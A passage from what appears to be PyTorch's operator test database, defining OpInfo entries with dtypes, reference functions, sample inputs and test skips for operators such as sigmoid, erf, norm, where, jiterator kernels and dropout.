supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_inner, ), OpInfo('tensordot', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), dtypesIfROCM=floating_and_complex_types_and(torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_tensordot, skips=( # Skip operator schema test because this is a functional and not an operator. 
# Reference: https://github.com/pytorch/pytorch/issues/54574 DecorateInfo(unittest.skip("Skipped!"), 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'), ) ), OpInfo('to_sparse', op=lambda x, *args: x.to_sparse(*args), sample_inputs_func=sample_inputs_to_sparse, dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), backward_dtypes=floating_types(), backward_dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_sparse_csr=True, check_batched_grad=False, check_batched_gradgrad=False, skips=( # to_sparse does not support automatic differentiation for outputs with complex dtype DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_nondifferentiable', dtypes=(torch.cdouble,)), # NotImplementedError: Could not run 'aten::normal_' with arguments from the 'SparseCPU' backend DecorateInfo(unittest.skip(""), 'TestCommon', 'test_noncontiguous_samples'), # TODO: FIXME: complex inputs requiring grad error in forward DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_dtypes'), # lambda impl DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), # Allowed exception: sparse tensors don't have strides DecorateInfo(unittest.skip("Allowed exception"), 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.skip("Allowed exception"), 'TestCompositeCompliance', 'test_backward'), # TODO: implement csr.to_sparse(sample_dim) where sampled_dim is 1. DecorateInfo(unittest.skip("csr.to_sparse(1) not implemented. Skipped!"), 'TestSparseCSR', 'test_sparse_csr_consistency'), ) ), OpInfo('logcumsumexp', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), backward_dtypes=floating_types_and(torch.bfloat16), backward_dtypesIfCUDA=floating_types_and(torch.bfloat16), skips=( # AssertionError: UserWarning not triggered : Resized a non-empty tensor but did not warn about it. 
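           # For context, a deliberately naive (overflow-prone) sketch of what
           # logcumsumexp computes -- illustrative only, not the tested ref:
           #   >>> x = torch.randn(5)
           #   >>> naive = torch.log(torch.cumsum(torch.exp(x), dim=0))
           #   >>> torch.allclose(naive, torch.logcumsumexp(x, dim=0))
           #   True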
DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning', device_type='cuda'), ), sample_inputs_func=sample_inputs_logcumsumexp, error_inputs_func=error_inputs_logcumsumexp), UnaryUfuncInfo('sigmoid', aliases=('special.expit', 'nn.functional.sigmoid'), aten_backward_name='sigmoid_backward', ref=reference_sigmoid if TEST_SCIPY else _NOTHING, decorators=(precisionOverride({torch.float16: 1e-2, torch.complex64: 1e-1, torch.bfloat16: 1e-2}),), skips=( # Reference: https://github.com/pytorch/pytorch/issues/56012 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.complex64, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.chalf, torch.complex64, torch.cdouble]), # alias, nn.functional.sigmoid, will produce (because of warning string saved): # "RuntimeError: Expected to not find "sigmoid" but found it" DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_jit_alias_remapping')), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.complex32, torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=True, # sigmoid(z) = 1 / (1 + exp(-z)), at z = j * pi * odd_number, the denominator is zero reference_numerics_filter=NumericsFilter( condition=lambda x: (close_to_int(x / (math.pi * 1j)) if x.is_complex() else x.new_tensor(False, dtype=torch.bool)), safe_val=0)), UnaryUfuncInfo('digamma', ref=scipy.special.digamma if TEST_SCIPY else _NOTHING, aliases=('special.psi', 'special.digamma',), decorators=(precisionOverride({torch.float16: 5e-1}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True), UnaryUfuncInfo('special.entr', ref=scipy.special.entr if TEST_SCIPY else _NOTHING, aten_name='special_entr', supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=(precisionOverride({torch.float16: 1e-1, torch.bfloat16: 1e-1}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.bfloat16, torch.float16]), ), supports_inplace_autograd=False, sample_inputs_func=sample_inputs_entr), UnaryUfuncInfo('special.ndtri', ref=scipy.special.ndtri if TEST_SCIPY else _NOTHING, domain=(0, 1), aten_name='special_ndtri', dtypes=all_types_and(torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True), UnaryUfuncInfo('special.log_ndtr', aten_name='special_log_ndtr', ref=scipy.special.log_ndtr if TEST_SCIPY else _NOTHING, dtypes=all_types_and(torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), UnaryUfuncInfo('erf', ref=scipy.special.erf if TEST_SCIPY else _NOTHING, aliases=('special.erf', ), decorators=(precisionOverride({torch.float16: 1e-2, torch.bfloat16: 1e-2}),), skips=( DecorateInfo(unittest.skip("Skipped! 
sparse backward not supported"), 'TestSparseUnaryUfuncs', 'test_sparse_fn_grad'), ), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, assert_jit_shape_analysis=True, supports_sparse=True, supports_sparse_csr=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True), UnaryUfuncInfo('erfc', ref=scipy.special.erfc if TEST_SCIPY else _NOTHING, aliases=('special.erfc', ), decorators=(precisionOverride({torch.float16: 1e-2, torch.bfloat16: 1e-2}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True), UnaryUfuncInfo('erfinv', ref=scipy.special.erfinv if TEST_SCIPY else _NOTHING, aliases=('special.erfinv', ), decorators=(precisionOverride({torch.float16: 1e-2, torch.bfloat16: 1e-2, torch.float32: 1e-4}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half), supports_sparse_csr=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, domain=(-1, 1), skips=( # Reference: https://github.com/pytorch/pytorch/pull/49155#issuecomment-742664611 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', active_if=TEST_SCIPY and LooseVersion(scipy.__version__) < "1.4.0"), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', active_if=TEST_SCIPY and LooseVersion(scipy.__version__) < "1.4.0"), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', active_if=TEST_SCIPY and LooseVersion(scipy.__version__) < "1.4.0"), )), OpInfo("nn.functional.smooth_l1_loss", ref=reference_smooth_l1_loss, sample_inputs_func=sample_inputs_smooth_l1_loss, dtypes=floating_types_and(torch.float16, torch.bfloat16), backward_dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16), backward_dtypesIfCUDA=floating_types_and(torch.float16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # RuntimeError: input->type()->kind() == TypeKind::OptionalTypeINTERNAL ASSERT FAILED # at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":270, please report a bug to PyTorch. DecorateInfo(unittest.expectedFailure, "TestJit", "test_variant_consistency_jit"),)), OpInfo( "nn.functional.l1_loss", ref=loss_reference_reduction_wrapper(lambda input, target: np.abs(input - target)), aten_backward_name='l1_loss_backward', sample_inputs_func=sample_inputs_l1_loss, dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), backward_dtypes=all_types_and(torch.float16, torch.bfloat16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # RuntimeError: input->type()->kind() == TypeKind::OptionalTypeINTERNAL ASSERT FAILED # at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":270, please report a bug to PyTorch. 
    DecorateInfo(
        unittest.expectedFailure,
        "TestJit",
        "test_variant_consistency_jit",
        dtypes=(torch.float32,),
    ),
    ),
    ),
    UnaryUfuncInfo('lgamma',
                   ref=reference_lgamma if TEST_SCIPY else _NOTHING,
                   aliases=('special.gammaln', ),
                   decorators=(precisionOverride({torch.float16: 7e-1}),),
                   dtypes=all_types_and(torch.bool, torch.bfloat16),
                   dtypesIfCUDA=all_types_and(torch.bool, torch.half),
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True,
                   skips=(
                       # Reference: https://github.com/pytorch/pytorch/pull/50140#discussion_r552615345
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal',
                                    dtypes=[torch.bfloat16]),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large',
                                    device_type='cpu', dtypes=[torch.bfloat16]),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small',
                                    device_type='cpu', dtypes=[torch.bfloat16]),
                       # Reference: https://github.com/pytorch/pytorch/pull/50140#issuecomment-756150214
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal',
                                    dtypes=[torch.float32, torch.float64], active_if=IS_WINDOWS),
                       DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large',
                                    dtypes=[torch.float32, torch.float64], active_if=IS_WINDOWS),
                   ),
                   # lgamma has multiple singularities at x <= 0
                   reference_numerics_filter=NumericsFilter(condition=lambda x: x < 0.1, safe_val=1)),
    OpInfo(
        'logdet',
        dtypes=floating_types(),
        supports_out=False,
        sample_inputs_func=sample_inputs_logdet,
        decorators=(skipCPUIfNoLapack, skipCUDAIfNoMagma)),
    # `log_softmax` supports different dtypes based on whether the `dtype` argument
    # is passed or not. Hence two OpInfo entries, one with dtype and the other without.
    OpInfo(
        'log_softmax',
        aliases=('special.log_softmax', 'nn.functional.log_softmax'),
        supports_out=True,
        aten_backward_name='_log_softmax_backward_data',
        dtypes=floating_types_and(torch.bfloat16),
        dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16),
        sample_inputs_func=sample_inputs_softmax_variant,
        supports_forward_ad=True,
        assert_autodiffed=True),
    OpInfo(
        'log_softmax',
        variant_test_name='dtype',
        aliases=('special.log_softmax', 'nn.functional.log_softmax'),
        supports_out=True,
        dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16, torch.chalf),
        sample_inputs_func=partial(sample_inputs_softmax_variant, with_dtype=True),
        supports_forward_ad=True,
        assert_autodiffed=True),
    UnaryUfuncInfo('logit',
                   aten_backward_name='logit_backward',
                   ref=scipy.special.logit if TEST_SCIPY else _NOTHING,
                   domain=(0, 1),
                   aliases=('special.logit', ),
                   supports_forward_ad=True,
                   supports_fwgrad_bwgrad=True,
                   decorators=(precisionOverride({torch.bfloat16: 5e-1,
                                                  torch.float16: 5e-1}),),
                   dtypes=all_types_and(torch.bool, torch.bfloat16),
                   dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16),
                   sample_inputs_func=sample_inputs_logit),
    OpInfo('where',
           # Currently only the `input` is tested in gradcheck.
           # If we pass `condition` first, none of the inputs that support
           # autograd will be tested. Hence the following lambda.
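           # A sketch of the reshuffled call gradcheck effectively sees (the
           # differentiable tensor sits in the first, tested slot):
           #   >>> cond = torch.tensor([True, False])
           #   >>> torch.where(cond, torch.tensor([1., 2.]), torch.tensor([9., 9.]))
           #   tensor([1., 9.])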
           op=lambda self, condition, other: torch.where(condition, self, other),
           ref=lambda self, condition, other: np.where(condition, self, other),
           sample_inputs_func=sample_inputs_where,
           reference_inputs_func=reference_inputs_where,
           error_inputs_func=error_inputs_where,
           supports_out=False,
           supports_forward_ad=True,
           supports_fwgrad_bwgrad=True,
           decorators=(
               DecorateInfo(onlyCUDA, "TestCommon", 'test_errors'),),
           skips=(
               # lambda impl
               DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"),
               DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'),
           ),
           dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf)),
    OpInfo('nonzero',
           dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16),
           sample_inputs_func=sample_inputs_nonzero,
           supports_autograd=False,
           skips=(
               DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'),
               # nonzero(): argument 'out' must be Tensor, not tuple
               DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'),
               # https://github.com/pytorch/pytorch/issues/67458
               DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'),
               # nonzero does not raise a warning when the out is resized
               DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'),
               # Can't find schemas for this operator for some reason
               DecorateInfo(unittest.expectedFailure, 'TestOperatorSignatures', 'test_get_torch_func_signature_exhaustive'),
           )),
    # The following entries test jiterator's Python interface.
    # Jiterator can be used to author elementwise CUDA kernels;
    # jiterator._create_jit_fn returns a callable that behaves like a regular pytorch op.
    # See create_jit_fn in jiterator.py for more information.
    UnaryUfuncInfo(
        'jiterator_unary',
        op=torch.cuda.jiterator._create_jit_fn("template <typename T> T unary(T x) { return x * x + x; }"),
        ref=lambda x: x * x + x,
        dtypes=all_types_and_complex_and(torch.bfloat16, torch.float16, torch.bool),
        supports_out=False,
        supports_autograd=False,  # jiterator ops don't have backward defined
        decorators=[
            onlyCUDA,
            skipCUDAIfRocm,
            DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}),
                         'TestUnaryUfuncs', 'test_reference_numerics_extremal'),
            DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}),
                         'TestUnaryUfuncs', 'test_reference_numerics_hard'),
            DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}),
                         'TestUnaryUfuncs', 'test_reference_numerics_normal'),
            DecorateInfo(toleranceOverride({torch.float16: tol(atol=1e-02, rtol=1e-02)}),
                         'TestUnaryUfuncs', 'test_reference_numerics_small'),
        ],
        skips=(
            # Jiterator ops don't support neg or conj views
            DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view'),
            DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view'),
            DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_conj_view'),
            # Jiterator ops don't support CompositeCompliantTensor.
            # The following test should be an expectedFailure, but it causes cascading failures on CUDA, thus skipped.
            DecorateInfo(unittest.skip("skip"), 'TestCompositeCompliance', 'test_operator'),
            # Skip reference_numerics tests for bool type, as the defined function doesn't work for bool
            DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal',
                         dtypes=[torch.bool]),
            DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_hard',
                         dtypes=[torch.bool]),
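            # Usage sketch for the interface exercised by these jiterator
            # entries (CUDA-only; illustrative, mirroring the `op=` above):
            #   >>> fn = torch.cuda.jiterator._create_jit_fn(
            #   ...     "template <typename T> T unary(T x) { return x * x + x; }")
            #   >>> y = fn(torch.randn(4, device='cuda'))  # behaves like an eager op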
DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_normal', dtypes=[torch.bool]), # Expected failure: torch.jiterator_unary is not a valid op DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Skip Nvfuser DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo'), ) ), BinaryUfuncInfo( 'jiterator_binary', op=torch.cuda.jiterator._create_jit_fn( "template <typename T> T binary(T x, T y, T alpha) { return x + alpha * y; }", alpha=1), ref=lambda input, other, *, alpha=1: np.add(input, other) if alpha == 1 \ else np.add(input, np.multiply(alpha, other)), dtypes=all_types_and_complex_and(torch.bfloat16, torch.float16, torch.bool), sample_inputs_func=partial(sample_inputs_jiterator, num_inputs=2, alpha=-3.14), supports_out=False, supports_autograd=False, # jiterator ops doesn't have backward defined supports_rhs_python_scalar=False, decorators=[onlyCUDA, skipCUDAIfRocm], skips=( # Jiterator ops doesn't support neg or conj view DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_conj_view'), # Jiterator ops doesn't suport CompositeCompliantTensor # Following test should expectedFailure, but it's causing cascading failures in CUDA, thus skipped DecorateInfo(unittest.skip("skip"), 'TestCompositeCompliance', 'test_operator'), # Expected failure: torch.jiterator_binary is not a valid op DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Skip Nvfuser DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo'), ) ), OpInfo( 'jiterator_4inputs_with_extra_args', op=torch.cuda.jiterator._create_jit_fn( "template <typename T> T binary(T i0, T i1, T i2, T i3, T alpha, T beta) { return alpha * i0 + beta * i1 + i2 + i3; }", alpha=1, beta=1), ref=lambda i0, i1, i2, i3, *, alpha=1, beta=1: alpha * i0 + beta * i1 + i2 + i3, dtypes=all_types_and_complex_and(torch.bfloat16, torch.float16, torch.bool), sample_inputs_func=partial(sample_inputs_jiterator, num_inputs=4, alpha=3.14, beta=-4.20), supports_out=False, supports_autograd=False, # jiterator ops doesn't have backward defined decorators=[onlyCUDA, skipCUDAIfRocm], skips=( # Jiterator ops doesn't support neg or conj view DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view'), DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_conj_view'), # Jiterator ops doesn't suport CompositeCompliantTensor # Following test should expectedFailure, but it's causing cascading failures in CUDA, thus skipped DecorateInfo(unittest.skip("skip"), 'TestCompositeCompliance', 'test_operator'), # Expected failure: torch.jiterator_4inputs_with_extra_args is not a valid op DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # Skip Nvfuser DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo'), ) ), BinaryUfuncInfo( 'jiterator_binary_return_by_ref', op=torch.cuda.jiterator._create_multi_output_jit_fn( """ template <typename T> T binary_return_by_ref(T i0, T i1, T& out0) { out0 = i0 + i1; } """, num_outputs=1), ref=lambda i0, i1: i0 + i1, dtypes=all_types_and_complex_and(torch.bfloat16, torch.float16, torch.bool), sample_inputs_func=partial(sample_inputs_jiterator, num_inputs=2, alpha=-0.42), supports_out=False, supports_autograd=False, # jiterator ops doesn't have backward defined 
        supports_rhs_python_scalar=False,
        decorators=[onlyCUDA, skipCUDAIfRocm],
        skips=(
            # Jiterator ops don't support neg or conj views
            DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view'),
            DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view'),
            DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_conj_view'),
            # Jiterator ops don't support CompositeCompliantTensor.
            # The following test should be an expectedFailure, but it causes cascading failures on CUDA, thus skipped.
            DecorateInfo(unittest.skip("skip"), 'TestCompositeCompliance', 'test_operator'),
            # Expected failure: torch.jiterator_4inputs_with_extra_args is not a valid op
            DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'),
            # Skip Nvfuser
            DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo'),
        )
    ),
    OpInfo(
        'jiterator_2inputs_2outputs',
        op=torch.cuda.jiterator._create_multi_output_jit_fn(
            """
            template <typename T>
            T binary_2outputs(T i0, T i1, T& out0, T& out1) {
                out0 = i0 + i1;
                out1 = i0 - i1;
            }
            """,
            num_outputs=2),
        ref=lambda i0, i1, *, alpha=1: (i0 + i1, i0 - i1),
        dtypes=all_types_and_complex_and(torch.bfloat16, torch.float16, torch.bool),
        sample_inputs_func=partial(sample_inputs_jiterator, num_inputs=2),
        supports_out=False,
        supports_autograd=False,  # jiterator ops don't have backward defined
        decorators=[onlyCUDA, skipCUDAIfRocm],
        skips=(
            # Jiterator ops don't support neg or conj views
            DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_view'),
            DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_conj_view'),
            DecorateInfo(unittest.expectedFailure, 'TestMathBits', 'test_neg_conj_view'),
            # Jiterator ops don't support CompositeCompliantTensor.
            # The following test should be an expectedFailure, but it causes cascading failures on CUDA, thus skipped.
            DecorateInfo(unittest.skip("skip"), 'TestCompositeCompliance', 'test_operator'),
            # Expected failure: torch.jiterator_4inputs_with_extra_args is not a valid op
            DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'),
            # Skip Nvfuser
            DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo'),
        )
    ),
    # `torch.norm` has multiple code paths depending on the value of `p`.
    # These paths have different dtype support. Also, JIT supports most
    # variants but not all of them. So we split the OpInfo entries for
    # `norm` based on the code paths and JIT support.
    OpInfo(
        "norm",
        sample_inputs_func=sample_inputs_norm,
        dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16),
        supports_forward_ad=True,
        supports_fwgrad_bwgrad=True,
        skips=(
            # AssertionError: RuntimeError not raised : Expected RuntimeError when doing an unsafe cast from a result
            # of dtype torch.float32 into an out= with dtype torch.long
            DecorateInfo(
                unittest.expectedFailure,
                "TestCommon",
                "test_out",
                device_type="meta",
            ),
            DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad',
                         dtypes=[torch.complex128]),
        ),
    ),
    OpInfo('norm',
           variant_test_name='nuc',
           aten_name='nuclear_norm',
           sample_inputs_func=sample_inputs_norm_nuc,
           decorators=[skipCUDAIfNoMagmaAndNoCusolver, skipCPUIfNoLapack],
           check_batched_gradgrad=False,
           # torch.autograd.gradcheck.GradcheckError: While computing batched gradients
           # got: Could not allocate memory to change Tensor SizesAndStrides!
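           # The user-facing dispatch that this `norm` split mirrors (illustrative):
           #   >>> m = torch.randn(3, 3)
           #   >>> torch.norm(m)                          # default Frobenius path
           #   >>> torch.norm(m, p='nuc')                 # nuclear norm (LAPACK-backed)
           #   >>> torch.norm(m, p=float('inf'), dim=1)   # inf-norm path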
check_batched_forward_grad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=floating_and_complex_types(), dtypesIfCUDA=floating_and_complex_types(), skips=( # RuntimeError not raised : # Expected RuntimeError when calling with input.device=cpu and out.device=cuda DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), # RuntimeError: # Arguments for call are not valid. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.complex64, torch.float32,)), # noqa: B950 ) ), OpInfo('norm', variant_test_name='fro', aten_name='frobenius_norm', sample_inputs_func=sample_inputs_norm_fro, dtypes=floating_and_complex_types_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, # torch.autograd.gradcheck.GradcheckError: While computing batched gradients # got: Could not allocate memory to change Tensor SizesAndStrides! check_batched_forward_grad=False, supports_fwgrad_bwgrad=True, skips=( # Pre-existing condition; Needs to be fixed DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_operator'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), # Expected RuntimeError when calling with input.device=cpu and out.device=cuda DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), # Arguments for call are not valid. DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.complex64, torch.float32,)), # noqa: B950 )), OpInfo( "norm", variant_test_name="inf", sample_inputs_func=sample_inputs_norm_inf, dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=[torch.complex128]), # AssertionError: RuntimeError not raised : Expected RuntimeError when doing an unsafe cast from a result # of dtype torch.float32 into an out= with dtype torch.long DecorateInfo( unittest.expectedFailure, "TestCommon", "test_out", device_type="meta", ), ), ), OpInfo('t', sample_inputs_func=sample_inputs_t, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # vmap does not support inplace views check_inplace_batched_forward_grad=False, autodiff_fusible_nodes=[], # aliases inputs, shouldn't be fused autodiff_nonfusible_nodes=[], # aliases inputs, shouldn't be fused dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), assert_autodiffed=True, error_inputs_func=error_inputs_t), UnaryUfuncInfo('special.erfcx', ref=scipy.special.erfcx if TEST_SCIPY else _NOTHING, aten_name='special_erfcx', decorators=(toleranceOverride({torch.float32: tol(atol=0, rtol=4e-6), }),), dtypes=all_types_and(torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True), OpInfo( "nn.functional.dropout", op=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.dropout, input, *args, **kwargs), ref=_NOTHING, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), # Probably because we have used lambda for the op here # AssertionError: JIT Test does not execute any logic DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # 
inplace variant dispatches to dropout kernel, while on CUDA # the op dispatches to _fused_dropout (with a few more conditions) # hence, different values and this skip here DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_view', device_type='cuda'),), gradcheck_wrapper=wrapper_set_seed, supports_forward_ad=True, supports_fwgrad_bwgrad=True, # https://github.com/pytorch/pytorch/issues/66357 check_batched_forward_grad=False, supports_out=False, sample_inputs_func=sample_inputs_dropout, inplace_variant=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.dropout, input, *args, **kwargs, inplace=True)), OpInfo( "nn.functional.dropout2d", op=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.dropout2d, input, *args, **kwargs), ref=_NOTHING, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # torch.autograd.gradcheck.GradcheckError: While computing batched gradients, got: # vmap: We do not yet support calling random operations inside of vmap. # Please perform random operations outside of vmap as a workaround DecorateInfo(unittest.expectedFailure, 'TestGradients', "test_forward_mode_AD"), DecorateInfo(unittest.expectedFailure, 'TestGradients', "test_inplace_forward_mode_AD"),), gradcheck_wrapper=wrapper_set_seed, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, # As per the docs, valid input dims are (3, 4) sample_inputs_func=partial(sample_inputs_dropout, valid_input_dim=(3, 4)), inplace_variant=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.dropout2d, input, *args, **kwargs, inplace=True)), # In training mode, feature_alpha_dropout currently doesn't support inputs of complex dtype # unlike when `train=False`, it supports complex inputs, hence 2 OpInfos to cover all cases OpInfo( "nn.functional.feature_alpha_dropout", op=lambda input, *args, **kwargs: wrapper_set_seed(torch.nn.functional.feature_alpha_dropout, input, *args, **kwargs), variant_test_name="with_train", ref=_NOTHING, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), skips=( # lambda impl DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), # torch.autograd.gradcheck.GradcheckError: While computing batched gradients, got: # vmap: We do not yet support calling random operations inside of vmap. 
